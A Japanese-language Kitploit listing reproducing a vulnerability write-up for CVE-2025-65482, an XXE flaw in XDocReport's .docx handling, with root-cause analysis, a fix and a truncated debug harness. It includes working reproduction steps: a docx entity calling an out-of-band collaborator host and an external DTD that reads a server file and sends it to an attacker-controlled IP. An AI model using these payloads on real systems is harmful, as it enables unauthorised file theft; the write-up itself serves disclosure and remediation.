Skip to content
KitploitKITPLOIT
ツールブログ
Log in
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

フィードお問い合わせプライバシー© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-65482-XXE- — CVE-2025-65482 (XXE) | Kitploit
ツール/GitHubGitHub/at190510-cuong/cve-2025-65482-xxe-
脆弱性分析エクスプロイトウェブアプリケーション悪用データ流出論文と研究学習と教育
GitHubat190510-cuong/cve-2025-65482-xxe-

CVE-2025-65482-XXE-

CVE-2025-65482 (XXE)

リポジトリを見る
11110ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-65482 (XXE)

XDocReportにおけるXML外部エンティティインジェクション(XXE)

Bug Definition

脆弱性の概要

  • XML External Entity Injection (XXE)は、XML形式のデータ処理における脆弱性であり、ユーザーが外部のファイルやシステムを参照するXMLデータを挿入します。攻撃者は、特定されたこのXXE脆弱性を利用して、他のシステムをスキャンして開いているサービスポートを探したり、機密ファイルを要求したり、通常はアクセスできない接続システムの機能にアクセスしたりすることができます。これにより、攻撃者はデータを抽出し、システムと相互作用し、XMLの挿入を通じてサービス妨害を引き起こす可能性があります。

ビジネスへの影響

  • XXEは、ユーザーの信頼と信用の喪失により、企業の評判に損害を与える可能性があります。また、通知、修復、および侵害されたPIIデータのコストを通じて、データ盗難や企業への間接的な経済的損失につながる可能性があります。

重要度 HIGH

image

説明と影響

人事管理ウェブサイトでは、ユーザーが.docx文書ファイルをシステムにアップロードできます。処理中に、アプリケーションはfr.opensagres.xdocreport.document.docxライブラリを使用しますが、このライブラリはユーザーの.docxファイルをSAXParserに渡す際にXXE脆弱性を含んでいます。

影響を受けるコンポーネント

fr.opensagres.xdocreport.template.docx — XDocReport (versions =< 2.0.3)

根本原因分析

原因はApache POIの使用

fr.opensagres.xdocreport.document.docx
   └── fr.opensagres.xdocreport.document
         └── fr.opensagres.xdocreport.template
               └── fr.opensagres.xdocreport.converter
                     └── org.apache.poi.xwpf.converter.core
                           ├── org.apache.poi:poi
                           └── org.apache.poi:poi-ooxml

つまり、Apache POIは非常に深い階層にあり、モジュール:

org.apache.poi.xwpf.converter.core

image

このエラーは、XDocReport(fr.opensagres.xdocreport.document.docxモジュール内)がApache POIを使用して.docxファイルを読み取り、POIがJavaのデフォルトのSAXParserを使用しているが、DTDと外部エンティティの処理を許可する機能を無効にしていないために発生します。 →これにより、攻撃者は外部を指すエンティティ(SYSTEM "http://...")や内部ファイル(file:///...)を含むDOCTYPEを挿入できるようになり、XXEが発生します。

image

XDocReport → fr.opensagres.xdocreport.document.docx → Apache POI (org.apache.poi.xwpf.converter.core) → SAXParser (javax.xml.parsers.SAXParser)

再現手順

  • 任意のdocxファイルを解凍する
unzip ../vcspentest.docx

image

  • docx内のdocument.xmlファイルの内容を編集する
nano word/document.xml

image

以下のようなcollaborator経由のoutbandペイロードで編集する:

<!DOCTYPE x [ <!ENTITY xxe SYSTEM "http://qrlbu64xvd8jr1y8zwcgoiwnler5fx3m.oastify.com/"> ]>
<x>&xxe;</x>

image

  • pocファイルに再圧縮する
 zip -r ../poc.docx *

image

image

  • 編集したdocxファイルをアップロードしてxdocreportの処理を通過させる

image

  • 結果、collaboratorにリクエストが送信されたことを確認

image

  • 影響を拡大し、システム内のファイルを読み取る
  • WSLマシン172.26.208.130にdtdファイルをホストする。vcspentest.dtdの内容は以下の通り:
<!ENTITY % file SYSTEM "file:///d:/vcspentest.txt">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://172.26.208.130:8888/?x=%file;'>">
%eval;
%exfil;

image

image

WSLマシンから外部DTDをロードするために、.docxファイル内のword/document.xmlファイルを以下の内容で編集する:

<!DOCTYPE users [<!ENTITY % xxe SYSTEM "http://172.26.208.130:8888/vcspentest.dtd"> %xxe;]>

image

  • ファイルを.docxにzip圧縮し、サーバーにアップロードして処理させる

image

image

  • WSLマシンで、対象サーバー上のファイルD:/vcspentest.txtの内容を含むリクエストが送信されたことを確認

image

image

解決策

  • https://github.com/opensagres/xdocreport/pull/547/commits/a8e48d17f02c19b807efe450d20f1755e45d818b

image

コード内またはXMLパーサーの設定レイヤーで、DTDおよび外部エンティティに関連するすべての機能を無効にする必要があります。

以下のコードと同様の修正

    @RequestMapping(value = "/SAXParser/vuln", method = RequestMethod.POST)
    public String SAXParserVuln(HttpServletRequest request) {
        try {
            String body = WebUtils.getRequestBody(request);
            logger.info(body);

            SAXParserFactory spf = SAXParserFactory.newInstance();
            SAXParser parser = spf.newSAXParser();
            parser.parse(new InputSource(new StringReader(body)), new DefaultHandler());  // parse xml

            return "SAXParser xxe vuln code";
        } catch (Exception e) {
            logger.error(e.toString());
            return EXCEPT;
        }
    }


    @RequestMapping(value = "/SAXParser/sec", method = RequestMethod.POST)
    public String SAXParserSec(HttpServletRequest request) {
        try {
            String body = WebUtils.getRequestBody(request);
            logger.info(body);

            SAXParserFactory spf = SAXParserFactory.newInstance();
            spf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
            spf.setFeature("http://xml.org/sax/features/external-general-entities", false);
            spf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
            SAXParser parser = spf.newSAXParser();
            parser.parse(new InputSource(new StringReader(body)), new DefaultHandler());  // parse xml
        } catch (Exception e) {
            logger.error(e.toString());
            return EXCEPT;
        }
        return "SAXParser xxe security code";
    }

デバッグ環境のセットアップ

image

  • Main.javaファイル
package org.example;

import fr.opensagres.xdocreport.document.IXDocReport;
import fr.opensagres.xdocreport.document.registry.XDocReportRegistry;
import fr.opensagres.xdocreport.template.IContext;
import fr.opensagres.xdocreport.template.TemplateEngineKind;

import java.io.*;
import java.io.File;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.InputStream;
import java.io.OutputStream;

public class Main {

    public static void main(String[] args) {
        try {
            // Đọc file đầu vào chứa biểu thức Velocity
            File docxTemplate = new File("C:\\Users\\HP\\Downloads\\New folder (3)\\poc.docx"); // File đầu vào
            InputStream input = new FileInputStream(docxTemplate);
ツールをダウンロード